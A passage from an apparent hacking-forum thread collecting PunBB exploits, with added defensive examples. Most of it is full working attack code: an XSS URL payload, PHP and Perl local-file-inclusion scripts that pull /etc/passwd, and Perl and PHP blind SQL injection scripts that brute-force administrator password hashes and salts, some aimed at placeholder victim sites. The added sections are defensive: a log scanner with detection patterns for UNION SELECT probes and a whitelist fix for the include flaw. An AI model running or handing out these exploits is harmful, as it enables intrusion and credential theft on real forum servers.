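For the defensive side of the UNION injections in this post (and the search.php one from post #1): an added example, not from the post, of a small access-log scanner that URL-decodes query strings the way the forum's PHP would see them and flags UNION SELECT and information_schema probes. The log lines are constructed from the thread's own payload shapes; the rule names and the function names are mine.

```python
import re
from urllib.parse import unquote_plus

# Constructed Apache combined-log lines: three carry the payload shapes used in this
# thread (message_popup.php, download.php, search.php), two are ordinary traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Jul/2008:10:01:02 +0300] "GET /punbb/message_popup.php?id=0+UNION+SELECT+user_id,concat_ws(0x3a,table_name),2,3+FROM+INFORMATION_SCHEMA.TABLES+LIMIT+3,1 HTTP/1.1" 200 1843
10.0.0.5 - - [23/Jul/2008:10:01:09 +0300] "GET /punbb/download.php?aid=9999+UNION+SELECT+1,password,3,7,null,6+FROM+punbb_users+WHERE+id+like+2 HTTP/1.1" 200 912
10.0.0.9 - - [23/Jul/2008:10:02:41 +0300] "GET /punbb/search.php?action=search&keywords=hello&result_list%5B%3C+UNION+SELECT+1%2C2%2C3+%2F%2A%5D=1 HTTP/1.1" 200 5120
10.0.0.7 - - [23/Jul/2008:10:03:00 +0300] "GET /punbb/viewtopic.php?id=12 HTTP/1.1" 200 7733
10.0.0.7 - - [23/Jul/2008:10:03:15 +0300] "POST /punbb/login.php?action=in HTTP/1.1" 302 0
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# (rule name, pattern) pairs applied to the decoded query string
RULES = [
    ("union_select", re.compile(r"\bunion\b[\s/*]+(all\s+)?select\b", re.I)),
    ("information_schema", re.compile(r"\binformation_schema\.", re.I)),
]


def decode_query(path: str) -> str:
    """Decode the query the way PHP fills $_GET: %xx escapes and '+' both become
    characters. Decoding a second time also exposes one level of double encoding."""
    query = path.partition("?")[2]
    return unquote_plus(unquote_plus(query))


def scan_log(text: str):
    """Return one record per request whose decoded query trips at least one rule."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_query(m.group("path"))
        matched = [name for name, rx in RULES if rx.search(decoded)]
        if matched:
            hits.append({
                "ip": m.group("ip"),
                "time": m.group("ts"),
                "script": m.group("path").partition("?")[0].rsplit("/", 1)[-1],
                "rules": matched,
                "query": decoded,
            })
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["script"], ",".join(hit["rules"]), hit["query"])
```

Matching on the decoded query rather than the raw line matters here: the search.php payload in the log is sent with `%5B`, `%3C` and `%2F%2A`, so a pattern applied to the raw request line would only see `+UNION+SELECT+` by luck of the `+` encoding. POST bodies are not in the access log at all, so this catches the GET-based probes in the thread and nothing sent via POST.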
  7. Dr.Z3r0

    XSS PunBB 1.3RC

    XSS in the very latest version, 1.3RC

    Code:
    http://punbb/1.3/style/Oxygen/Oxygen.php?base_url=Oxygen.css" onload=alert()> <!---&forum_user[style]=1
     
    #7 Dr.Z3r0, 28 Jul 2008
    Last edited by a moderator: 3 Sep 2008
  8. kremator

    Multiple vulnerabilities in PunBB <= 1.2.19

    PunBB versions up to 1.2.19

    The discovered vulnerabilities allow a remote user to carry out an XSS attack and bypass some security restrictions.

    1. The vulnerability exists due to insufficient filtering of input data in the include/parser.php script. With a specially crafted request a remote user can execute arbitrary script code in the victim's browser in the security context of the vulnerable site.

    2. The vulnerability exists due to an unknown error that allows a remote user to inject arbitrary SMTP commands.
     
    #8 kremator, 30 Jul 2008
    Last edited by a moderator: 3 Sep 2008
  9. ~!DoK_tOR!~

  10. yarbabin

    PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit

    http://www.milw0rm.com/exploits/7159
    PHP:
    <?php

    error_reporting(0);
    ini_set("default_socket_timeout", 5);

    /*


        PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit
        -----------------------------------------------------------
        by athos - staker[at]hotmail[dot]it
        download mod http://www.punres.org/files.php?pid=52
        download cms http://punbb.org
        -----------------------------------------------------------
        register_globals = 1
        magic_quotes_gpc = 1

        Directory (files/include/pms)

        functions_navlinks.php?pun_user[language]=../../../../../etc/passwd
        profile_send.php?pun_user[language]=../../../../../etc/passwd
        viewtopic_PM-link.php?pun_user[language]=../../../../../etc/passwd

        ../../etc/passwd and nullbyte


        File (files/include/pms/functions_navlinks.php)

        1. <?php
        2.     require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

        $pun_user['language'] isn't declared :D you can include any file

        functions_navlinks.php?pun_user[language]=../../../etc/passwd%00
        -------------------------------------------------------------------

        File (files/include/pms/header_new_messages.php)

        1. <?php
        2. if(!$pun_user['is_guest'] && $pun_user['g_pm'] == 1 && $pun_config['o_pms_enabled'] ){
        3. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

        $pun_user['g_pm'] isn't declared
        $pun_config['o_pms_enabled'] isn't declared

        header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=../etc/passd%00


        -------------------------------------------------------------------

        File (files/include/pms/profile_send.php))

        1. <?php
        2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

        $pun_user['language'] isn't declared

        profile_send.php?pun_user[language]=../../../../etc/passwd%00

        -------------------------------------------------------------------

        File (files/include/pms/viewtopic_PM-link.php)

        1. <?php
        2. require PUN_ROOT.'lang/'.$pun_user['language'].'/pms.php';

        $pun_user['language'] isn't declared

        viewtopic_PM-link.php?pun_user[language]=../../../../etc/passwd%00

        -------------------------------------------------------------------


        Usage:  php [punbb.php] [host/path] [mode]
                php [punbb.php] [host/path] [save]
                php [punbb.php] [host/path] [NULL]

       Example:
                php punbb.php localhost/punbb save
                php punbb.php localhost/punbb


        NOTE: Don't add me on MSN Messenger


    */

    $exploit = new Exploit;
    $domain = $argv[1];
    $mymode = $argv[2];

    $exploit->starting();
    $exploit->is_vulnerable($domain);
    $exploit->exploiting($domain, $mymode);



    class Exploit
    {

      // Send a raw HTTP request and return either the matching error status line or the whole response
      function http_request($host, $data)
      {

        if (!$socket = socket_create(AF_INET, SOCK_STREAM, SOL_TCP))
        {
           echo "socket_create() error!\r\n";
           exit;
        }
        if (!socket_set_option($socket, SOL_SOCKET, SO_BROADCAST, 1))
        {
          echo "socket_set_option() error!\r\n";
          exit;
        }

        if (!socket_connect($socket, $host, 80))
        {
          echo "socket_connect() error!\r\n";
          exit;
        }
        if (!socket_write($socket, $data, strlen($data)))
        {
          echo "socket_write() errror!\r\n";
          exit;
        }

        $content = '';
        while ($get = socket_read($socket, 1024, PHP_NORMAL_READ))
        {
          $content .= $get;
        }

        socket_close($socket);


        $array = array(
                     'HTTP/1.1 404 Not Found',
                     'HTTP/1.1 300 Multiple Choices',
                     'HTTP/1.1 301 Moved Permanently',
                     'HTTP/1.1 302 Found',
                     'HTTP/1.1 304 Not Modified',
                     'HTTP/1.1 400 Bad Request',
                     'HTTP/1.1 401 Unauthorized',
                     'HTTP/1.1 402 Payment Required',
                     'HTTP/1.1 403 Forbidden',
                     'HTTP/1.1 405 Method Not Allowed',
                     'HTTP/1.1 406 Not Acceptable',
                     'HTTP/1.1 407 Proxy Authentication Required',
                     'HTTP/1.1 408 Request Timeout',
                     'HTTP/1.1 409 Conflict',
                     'HTTP/1.1 410 Gone',
                     'HTTP/1.1 411 Length Required',
                     'HTTP/1.1 412 Precondition Failed',
                     'HTTP/1.1 413 Request Entity Too Large',
                     'HTTP/1.1 414 Request-URI Too Long',
                     'HTTP/1.1 415 Unsupported Media Type',
                     'HTTP/1.1 416 Request Range Not Satisfiable',
                     'HTTP/1.1 417 Expectation Failed',
                     'HTTP/1.1 Retry With',
                    );

        // check every status line before giving up and returning the full response
        for ($i = 0; $i < count($array); $i++)
        {
          if (eregi($array[$i], $content))
          {
            return ("$array[$i]\r\n");
          }
        }
        return ("$content\r\n");
      }


      // Probe profile_send.php with a quote: an escaped quote in the reply means magic_quotes_gpc is on
      function is_vulnerable($host)
      {
        $host = explode('/', $host);

        $header  = "GET /$host[1]/profile_send.php?pun_user[language]=%27 HTTP/1.1\r\n";
        $header .= "Host: $host[0]\r\n";
        $header .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
        $header .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        $header .= "Accept-Language: en-us,en;q=0.5\r\n";
        $header .= "Accept-Encoding: gzip,deflate\r\n";
        $header .= "Connection: close\r\n\r\n";

        if (stristr($this->http_request($host[0], $header), "\\'"))
        {
          echo "[+] Magic Quotes GPC/Register Globals On!\n";
          echo "[+] Exploit Failed!\n";
          exit;
        }
        else
        {
          return false;
        }
      }

      function starting()
      {

        global $argv;

        if (preg_match('#^http://(.+?)$#', $argv[1]) or empty($argv[1]))
        {

          echo "[+] PunBB (Private Messaging System 1.2.x) Multiple LFI Exploit\r\n";
          echo "[+] by athos - staker[at]hotmail[dot]it\r\n";
          echo "    -----------------------------------------------------------\r\n";
          echo "[+] Usage: php $argv[0] [host/path] [mode]\r\n";
          echo "[+] Usage: php $argv[0] [host/path] [save]\r\n";
          echo "[+] Usage: php $argv[0] [host/path]        \r\n";
          exit;

        }
      }

      function exploiting($host, $mode)
      {

        $host = explode('/', $host);
        
    $i 0;
        
        
        echo 
    "[+] Local File (ex: ../../etc/passwd%00)\r\n";
        echo 
    "[+] Local File: ";
        
        
    $file stripslashes(trim(fgets(STDIN)));
        
        if(empty(
    $file)) die("you fail");
        
        
        
    $array = array (
                        
    "functions_navlinks.php?pun_user[language]=$file",
                        
    "profile_send.php?pun_user[language]=$file",
                        
    "viewtopic_PM-link.php?pun_user[language]=$file",
                        
    "header_new_messages.php?pun_user[g_pm]=1&pun_config[o_pms_enabled]=x&pun_user[language]=$file",
                      ); 

        
    $write .= "GET /$host[1]/files/include/pms/$array[$i] HTTP/1.1\r\n";
        
    $write .= "Host: $host[0]\r\n";
        
    $write .= "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n";
        
    $write .= "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
        
    $write .= "Accept-Language: en-us,en;q=0.5\r\n";
        
    $write .= "Accept-Encoding: gzip,deflate\r\n";
        
    $write .= "Connection: close\r\n\r\n";
        

       
        
        if(
    stristr($this->http_request($host[0],$write),'No such file or directory in'))
        {
          
    $i++;
        }
        else
        {
          if(
    $mode == "save"
          {
       
            
    $rand rand(0,99999);
            
    fclose(fwrite(fopen(getcwd().'/'.$rand.'.txt',"a+"),$this->http_request($host[0],$write)));
            
            echo 
    "[+] File $rand Saved Successfully!\r\n";
            echo 
    "[+] Exploit Terminated!\r\n";
            exit;
          
          }
          else
          {
            echo 
    $this->http_request($host[0],$write);
            exit;
          }
        }
      }
    }
     
    _________________________
    1 person likes this.
  11. yarbabin

    yarbabin HACKIN YO KUT

    PHP:
    #!/usr/bin/perl

    =about

        PunBB (PunPortal 0.1) Local File Inclusion Exploit
        --------------------------------------------------
        by athos - staker[at]hotmail[dot]it
        download mod http://www.punres.org/download.php?id=1108
        download cms http://punbb.org

        register globals = 1
        magic quotes gpc = 1

        File (include/login.php)

        1. <?php
        2.
        3. // Show login if not logged in
        4. if($pun_user['is_guest'])
        5. {
        6. if(!isset($focus_element) || (isset($focus_element) && !in_array('login', $focus_element)))
        7. {
        8.
        9. // Load the language files
        10. require PUN_ROOT.'lang/'.$pun_user['language'].'/common.php';
        11. require PUN_ROOT.'lang/'.$pun_user['language'].'/login.php';

        $pun_user['is_guest'] isn't declared
        $pun_user['language'] isn't declared

        include/user/login.php?pun_user[is_guest]=a&pun_user[language]=../../etc/passwd%00

        how to fix? use the latest version (2.0)

        Usage: perl punbb.pl localhost/cms

    =cut


    use strict;
    use warnings;
    use IO::Socket;


    my $html = undef;
    my $site = $ARGV[0] or &help;
    my @take = split /\//,$site;

    my ($host,$path) = @take;

    if($site =~ /http:\/\/(.+?)/i) {
      print STDOUT "Invalid URL\n";
      exit;
    }

    print STDOUT "Local File (ex: ../../etc/passwd)\n";
    print STDOUT "Local File: ";

    chomp(my $file = <STDIN>);

    if(not defined($file)) {
      print STDOUT "File Not Defined!\n";
      exit;
    }


    my $evil = "/include/user/login.php?pun_user[is_guest]=a&pun_user[language]=";

    my $sock = new IO::Socket::INET(
                                     PeerAddr => $host,
                                     PeerPort => 80,
                                     Proto    => 'tcp',
                                     Timeout  => 6,
                                  ) or die $!;

    my $data = "GET /${path}/${evil}${file}%00 HTTP/1.1\r\n".
               "Host: $host\r\n".
               "User-Agent: Mozilla/4.5 [en] (Win95; U)\r\n".
               "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n".
               "Accept-Language: en-us,en;q=0.5\r\n".
               "Accept-Encoding: gzip,deflate\r\n".
               "Connection: close\r\n\r\n";

    $sock->send($data);

    while(<$sock>) {
      $html .= $_;
    }

    if($html =~ /(No such file or directory|HTTP\/1.1 404 Not Found)/i) {
      print STDOUT "Exploit Failed!\n";
      exit;
    }
    else {
      my $name = int(rand(999)).'.txt';

      open(FILE,">",$name);
      print FILE $html;
      close(FILE);

      print STDOUT "Exploit Successfully!\n";
      print STDOUT "$name saved!\n";
      exit;
    }


    sub help {
      print STDOUT "PunBB (PunPortal 0.1) Local File Inclusion Exploit\n".
                   "by athos - staker[at]hotmail[dot]it\n".
                   "Usage: perl $0 [host/path]\n";
      exit;
    }
    http://www.milw0rm.com/exploits/7168 (c)
     
    _________________________
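The LFI scripts in this thread (athos's PHP and Perl exploits above, and Dante90's rep_profile.php one further down) all rely on the same defect: with register_globals on, `$pun_user['language']` arrives straight from the query string and is concatenated into a `require` path. The following is an added example, not PunBB's code, showing a loader that accepts only names of language directories actually installed under `lang/` and so rejects the traversal and `%00` payloads shown above; the `lang/` layout and `PUN_ROOT` are taken from the quoted snippet, the function names are assumptions.

```php
<?php
// Added example (not PunBB code): whitelist-based loader for the
// lang/<language>/ require shown in include/login.php above.

/**
 * Return $requested only if it names an existing directory directly
 * under $langRoot; otherwise return the fallback language.
 */
function safe_language(string $requested, string $langRoot, string $fallback = 'English'): string
{
    // Reject anything that is not a plain directory name before touching
    // the filesystem: "../", an absolute path, "%00" and a raw NUL byte
    // all fail this anchored test.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,32}\z/', $requested)) {
        return $fallback;
    }
    // Second line of defence: the name must be one of the installed
    // language directories, and its resolved path must stay inside $langRoot.
    $installed = array_filter(scandir($langRoot), function ($entry) use ($langRoot) {
        return $entry !== '.' && $entry !== '..' && is_dir($langRoot . '/' . $entry);
    });
    if (!in_array($requested, $installed, true)) {
        return $fallback;
    }
    $real = realpath($langRoot . '/' . $requested);
    if ($real === false || strpos($real, realpath($langRoot) . DIRECTORY_SEPARATOR) !== 0) {
        return $fallback;
    }
    return $requested;
}

/**
 * The require the vulnerable code performs, with the language name
 * validated first. Returns the path that was actually required.
 */
function load_language_file(array $punUser, string $punRoot, string $file): string
{
    $lang = safe_language($punUser['language'] ?? '', $punRoot . 'lang');
    $path = $punRoot . 'lang/' . $lang . '/' . $file;
    require $path;
    return $path;
}

// --- constructed fixture: a throwaway PUN_ROOT with one language installed ---
$punRoot = sys_get_temp_dir() . '/punbb_demo_' . getmypid() . '/';
mkdir($punRoot . 'lang/English', 0700, true);
file_put_contents($punRoot . 'lang/English/common.php', "<?php \$lang_common = array('demo' => 1);\n");
file_put_contents($punRoot . 'lang/English/login.php',  "<?php \$lang_login = array('demo' => 1);\n");

// Constructed request values: what register_globals would hand the script.
$attempts = array(
    'English',              // legitimate
    '../../etc/passwd%00',  // the payload from the post above, as sent
    "../../etc/passwd\0",   // the same after URL decoding
    'French',               // well-formed but not installed
);
foreach ($attempts as $value) {
    $chosen = safe_language($value, $punRoot . 'lang');
    printf("%-24s -> %s\n", str_replace("\0", '\0', $value), $chosen);
}
// Only 'English' is returned unchanged; every other value falls back.

$loaded = load_language_file(array('language' => '../../etc/passwd%00'), $punRoot, 'common.php');
echo "required: $loaded\n";   // .../lang/English/common.php

// Remove the fixture again.
foreach (glob($punRoot . 'lang/English/*.php') as $f) {
    unlink($f);
}
rmdir($punRoot . 'lang/English');
rmdir($punRoot . 'lang');
rmdir($punRoot);
```

Turning register_globals off removes the source of the tainted value; the whitelist above is what protects the require even when the value comes from a legitimate user setting.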
  12. Solide Snake

    Solide Snake Banned

    PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit

    Code:
    #!/usr/bin/perl
    #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit
    #Coded By Dante90, WaRWolFz Crew
    #Bug Discovered By: Dante90, WaRWolFz Crew
    
    use strict;
    use LWP::UserAgent;
    use HTTP::Cookies;
    
    use HTTP::Request::Common;
    use Time::HiRes;
    use IO::Socket;
    
    my ($UserName,$PassWord,$ID) = @ARGV;
    if(@ARGV < 3){
        &usage();
        exit();
    }
    my $Message = "";
    my ($Hash,$Time,$Time_Start,$Time_End,$Response);
    my($Start,$End);
    my @chars = (48,49,50,51,52,53,54,55,56,57,97,98,99,100,101,102);
    my $Host = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
    my $Method = HTTP::Request->new(POST => $Host);
    my $Cookies = new HTTP::Cookies;
    my $HTTP = new LWP::UserAgent(
                agent => 'Mozilla/5.0',
                max_redirect => 0,
                cookie_jar => $Cookies,
            ) or die $!;
    my $Referrer = "form_sent=1&pid=10174&poster=Dante90, WaRWolFz Crew&method=1&req_message=http://www.warwolfz.com/&submit=Invia";
    my $DefaultTime = request($Referrer);
    
    sub Login(){
        my $Login = $HTTP->post($Host.'login.php?action=in',
                    [
                        form_sent        => '1',
                        redirect_url    => 'forums.php',
                        req_username    => $UserName,
                        req_password    => $PassWord,
                        login => 'Login',
                    ]) || die $!;
    
        if($Login->content =~ /Logged in successfully./i){
            return 1;
        }else{
            return 0;
        }
    }
    if (Login() == 1){
        $Message = " * Logged in as: ".$UserName;
    }elsif (Login() == 0){
        $Message = " * Login Failed.";
        refresh($Message, $Host, $DefaultTime, "0", $Hash, $Time, "1");
        print " * Exploit Failed                                     *\n";
        print " ------------------------------------------------------ \n";
        exit;
    }
    
    sub Blind_SQL_Jnjection{
        my ($dec,$hex) = @_;
        return "Dante90, WaRWolFz Crew\" OR ASCII(SUBSTRING((SELECT `password` FROM `users` WHERE `id`=${ID}),${dec},1))=${hex}/*";
    }
    
    for(my $I=1; $I<=40; $I++){ #N Hash characters
        for(my $J=0; $J<=15; $J++){ #0 -> F
            my $Post = $HTTP->post($Host.'reputation.php?',[
                        form_sent    => '1',
                        pid            => '2',
                        poster        => Blind_SQL_Jnjection($I,$chars[$J]),
                        method        => '1',
                        req_message    => 'http://www.warwolfz.com/',
                        submit        => 'Submit',
                    ]) || die $!;
            $Time = request($Referrer);
            refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
            if($Post->content =~ /(The reputation has been successfully changed)/i){
                syswrite(STDOUT,chr($chars[$J]));
                $Hash .= chr($chars[$J]);
                $Time = request($Referrer);
                refresh($Message, $Host, $DefaultTime, $J, $Hash, $Time, $I);
                last;
            }
        }
        if($I == 1 && length $Hash < 1 && !$Hash){
            print " * Exploit Failed                                     *\n";
            print " ------------------------------------------------------ \n";
            exit;
        }
        if($I == 40){
            print " * Exploit Successed                                  *\n";
            print " ------------------------------------------------------\n ";
            system("pause");
        }
    }
    
    sub usage{
        system("cls");
        {
            print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
            print " ------------------------------------------------------ \n";
            print " * USAGE:                                             *\n";
            print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
            print " * perl name_exploit.pl [username] [password] [id]    *\n";
            print " ------------------------------------------------------ \n";
            print " *         Powered By Dante90, WaRWolFz Crew          *\n";
            print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
            print " ------------------------------------------------------ \n";
        };
        exit;
    }
    
    sub request{
        $Referrer = $_[0];
        $Method->content_type('application/x-www-form-urlencoded');
        $Method->content($Referrer);
        $Start = Time::HiRes::time();
        $Response = $HTTP->request($Method);
        $Response->is_success() or die "$Host : ", $Response->message,"\n";
        $End = Time::HiRes::time();
        $Time = $End - $Start;
        return $Time;
    }
    
    sub refresh{
        system("cls");
        {
            print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Remote Blind SQL Injection Exploit\n";
            print " ------------------------------------------------------ \n";
            print " * USAGE:                                             *\n";
            print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
            print " * perl name_exploit.pl [username] [password] [id]    *\n";
            print " ------------------------------------------------------ \n";
            print " *         Powered By Dante90, WaRWolFz Crew          *\n";
            print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
            print " ------------------------------------------------------ \n";
        };
        print $_[0] ."\n";
        print " * Victime Site: " . $_[1] . "\n";
        print " * Default Time: " . $_[2] . " seconds\n";
        print " * BruteForcing Hash: " . chr($chars[$_[3]]) . "\n";
        print " * BruteForcing N Char Hash: " . $_[6] . "\n";
        print " * SQL Time: " . $_[5] . " seconds\n";
        print " * Hash: " . $_[4] . "\n";
    }
    
    #WaRWolFz Crew
    
    # milw0rm.com [2009-07-28]
     
  13. Solide Snake

    Solide Snake Banned

    PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit

    Code:
    #!/usr/bin/perl
    #[0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit
    #Coded By Dante90, WaRWolFz Crew
    #Bug Discovered By: Dante90, WaRWolFz Crew
    #register_globals = On
    #magic_quotes_gpc = On
    
    
    use LWP::UserAgent;
    use HTTP::Cookies;
    use strict;
    
    my $EtcPasswd;
    my $TransversalDirectory = "./../../../../"; #Transversal Directory
    my $LFI = "etc/passwd"; #File Inject
    my $HostName = "http://www.victime_site.org/path/"; #Insert Victime Web Site Link
    
    my $Referrer = "http://www.warwolfz.com/";
    
    my $Cookies = new HTTP::Cookies;
    my $UserAgent = new LWP::UserAgent(
    			agent => 'Mozilla/5.0',
    			max_redirect => 0,
    
    			cookie_jar => $Cookies,
    		) or die $!;
    
    sub Local_File_Inclusion{
    	my ($Directory,$Command) = @_;
    	return "./include/reputation/rep_profile.php?pun_user[language]=${Directory}${Command}%00";
    
    }
    
    my $Get = $UserAgent->get($HostName.Local_File_Inclusion($TransversalDirectory,$LFI));
    
    if ($Get->content =~ /No such file or directory in/i){
    	refresh($HostName, "Exploit Filed");
    	print " * Error extracting sensible data.\n";
    
    	print " * Exploit Failed                                     *\n";
    	print " ------------------------------------------------------ \n\n";
    }else{
    	$EtcPasswd = $Get->content;
    	open ( FILE , ">WaRWolFz.html" ) or die $!;
    
    	print FILE $EtcPasswd;
    	close ( FILE );
    	refresh($HostName, "File Saved");
    	print " * Exploit Successed                                  *\n";
    	print " ------------------------------------------------------\n\n";
    
    	system("pause");
    }
    
    sub usage{
    	system("cls");
    	{
    		print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
    		print " ------------------------------------------------------ \n";
    
    		print " * USAGE:                                             *\n";
    		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
    		print " * perl name_exploit.pl                               *\n";
    
    		print " ------------------------------------------------------ \n";
    		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
    		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
    
    		print " ------------------------------------------------------ \n";
    	};
    	exit;
    }
    
    sub refresh{
    	system("cls");
    	{
    		print " \n [0-Day] PunBB Reputation.php Mod <= v2.0.4 Local File Inclusion Exploit\n";
    
    		print " ------------------------------------------------------ \n";
    		print " * USAGE:                                             *\n";
    		print " * cd [Local Disk]:\\[Directory Of Exploit]\\           *\n";
    
    		print " * perl name_exploit.pl                               *\n";
    		print " ------------------------------------------------------ \n";
    		print " *         Powered By Dante90, WaRWolFz Crew          *\n";
    
    		print " * www.warwolfz.org - dante90_founder[at]warwolfz.org *\n";
    		print " ------------------------------------------------------ \n";
    
    	};
    	print " * Victime Site: " . $_[0] . "\n";
    	print " * Etc/Passwd: " . $_[1] . "\n";
    }
    
    #WaRWolFz
    
    # milw0rm.com [2009-07-30]
     
  14. [underwater]

    [underwater] Member

    Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit

    Code:
    if (isset($_GET['secure_str']))
    {
        if (preg_match('~(\d+)f(\d+)~', $_GET['secure_str'], $match))
        {
            ...
            'WHERE'        => 'a.id = '.$attach_item.' AND (fp.read_forum IS NULL OR fp.read_forum = 1)
    preg_match abuse :(

    Code:
    #!/usr/bin/php
    <?php
    
    print_r('
    +---------------------------------------------------------------------------+
    Punbb Extension Attachment <= v1.0.2 Bind SQL injection exploit
    by puret_t
    mail: puretot at gmail dot com
    team: http://www.wolvez.org
    dork: "Powered by PunBB"
    +---------------------------------------------------------------------------+
    ');
    /**
    * works regardless of php.ini settings
    */
    if ($argc < 3) {
    print_r('
    +---------------------------------------------------------------------------+
    Usage: php '.$argv[0].' host path
    host:      target server (ip/hostname)
    path:      path to punbb
    Example:
    php '.$argv[0].' localhost /punbb/
    +---------------------------------------------------------------------------+
    ');
    exit;
    }
    
    error_reporting(7);
    ini_set('max_execution_time', 0);
    
    $host = $argv[1];
    $path = $argv[2];
    
    $pre = 'pun_';
    
    $benchmark = 200000000;
    $timeout = 10;
    
    echo "Plz Waiting...\nPassword:\n";
    /**
    * get pass
    */
    $j = 1;
    $pass = '';
    
    $hash[0] = 0; //null
    $hash = array_merge($hash, range(48, 57)); //numbers
    $hash = array_merge($hash, range(97, 122)); //az letters
    
    while (strlen($pass) < 40) {
    for ($i = 0; $i <= 255; $i ++) {
    if (in_array($i, $hash)) {
    $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20password%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
    send();
    usleep(2000000);
    $starttime = time();
    send();
    $endtime = time();
    $difftime = $endtime - $starttime;
    if ($difftime > $timeout) {
    $pass .= chr($i);
    echo chr($i);
    break;
    }
    }
    if ($i == 255)
    exit("\nExploit Failed!\n");
    }
    $j ++;
    }
    
    echo "\nSalt:\n";
    /**
    * get salt
    */
    $j = 1;
    $salt = '';
    
    $hash[0] = 0; //null
    $hash = array_merge($hash, range(33, 126));
    
    while (strlen($salt) < 12) {
    for ($i = 0; $i <= 255; $i ++) {
    if (in_array($i, $hash)) {
    $cmd = '1f1%27%20AND%20(IF((ASCII(SUBSTRING((SELECT%20salt%20FROM%20'.$pre.'users%20WHERE%20group_id=1%20LIMIT%201),'.$j.',1))='.$i.'),BENCHMARK('.$benchmark.',CHAR(0)),1))%23';
    send();
    usleep(2000000);
    $starttime = time();
    send();
    $endtime = time();
    $difftime = $endtime - $starttime;
    if ($difftime > $timeout) {
    $salt .= chr($i);
    echo chr($i);
    break;
    }
    }
    if ($i == 255)
    exit("\nExploit Failed!\n");
    }
    $j ++;
    }
    
    exit("\nExpoilt Success!\nPassword Hash:\t$pass\nSalt:\t$salt\n");
    
    function send()
    {
    global $host, $path, $cmd;
    
    $data = "GET ".$path."misc.php?item=1&secure_str=".$cmd."  HTTP/1.1\r\n";
    $data .= "Host: $host\r\n";
    $data .= "Connection: Close\r\n\r\n";
    
    $fp = fsockopen($host, 80);
    fputs($fp, $data);
    
    $resp = '';
    
    while ($fp && !feof($fp))
    $resp .= fread($fp, 1024);
    
    return $resp;
    }
    
    ?>
    
     
    1 person likes this.
  15. 547

    547 Active Member

    there's a blind one

    =================================================================
    PunBB <= 1.3.4 Pun_PM <= v1.2.6 Blind SQL Injection Vulnerability
    =================================================================


    PHP:
    #!/usr/bin/perl
    # [0-Day] PunBB <= 1.3.* Package: Pun_PM <= v1.2.6 Remote Blind SQL Injection Exploit
    # Author/s: Dante90, WaRWolFz Crew
    # Created: 2009.07.30 after 0 days the bug was discovered.
    # Crew Members: 4lasthor, Andryxxx, Cod3, Gho5t, HeRtZ, N.o.3.X, RingZero, s3rg3770, Shades Master, The:Paradox, V1R5, yeat
    # Greetings To: _ nEmO _, XaDoS, Necrofiend, Lutor, vagabondo, hacku, yawn, The_Exploited, Shotokan-The Hacker, _mRkZ_,
    #               Chuzz, init, plucky, SaRtE, Lupo
    # Thanks For Testing: BlAcK HaT, l3d
    # Web Site: www.warwolfz.org
    # My Wagend (Dante90): dante90wwz.altervista.org
    # Unit-X Project: www.unitx.net
    # ----
    # Why I've decided to publish this?
    # Because in "Package: Pun_PM <= v1.2.9" the bug was fixed.
    # ----
    # DETAILS
    # ./PunBB v1.3.*/extensions/pun_pm/functions.php
    # LINES: 504 -> 526
    #    function pun_pm_edit_message()
    #    {
    #        global $forum_db, $forum_user, $lang_pun_pm;
    #
    #        $errors = array();
    #
    #        // Verify input data
    #        $query = array(
    #            'SELECT'    => 'm.id as id, m.sender_id as sender_id, m.status as status, u.username as username, m.subject as subject, m.body as body',
    #            'FROM'        => 'pun_pm_messages m',
    #            'JOINS'        => array(
    #                array(
    #                    'LEFT JOIN'        => 'users AS u',
    #                    'ON'            => '(u.id = m.receiver_id)'
    #                ),
    #            ),
    #            'WHERE'        => 'm.id = '.$forum_db->escape($_GET['message_id']).' AND m.sender_id = '.$forum_user['id'].' AND m.deleted_by_sender = 0'
    #        );
    #
    #        ($hook = get_hook('pun_pm_fn_edit_message_pre_validate_query')) ? eval($hook) : null;
    #
    #        $result = $forum_db->query_build($query) or error(__FILE__, __LINE__);
    # ----
    # GET http://127.0.0.1/WaRWolFz/misc.php?section=pun_pm&pmpage=write&message_id=-1'
    # Error - PunBB
    # An error was encountered
